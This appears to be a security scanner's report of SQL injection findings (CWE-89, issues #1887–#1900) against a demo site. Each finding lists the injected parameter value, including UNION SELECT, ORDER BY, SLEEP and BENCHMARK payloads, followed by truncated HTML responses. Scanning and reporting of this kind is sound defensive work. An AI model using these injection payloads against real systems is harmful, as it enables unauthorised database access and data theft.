href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1887\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+\nCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1888\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1889\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 24--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1890\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# WHERE 1=1 AND 1=1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1891\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ||\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1892\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5)\n,3\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1893\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 24\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1894\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1895\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1896\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1897\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1898\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1899\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# WHERE 1=1 AND 1=1#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1900\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 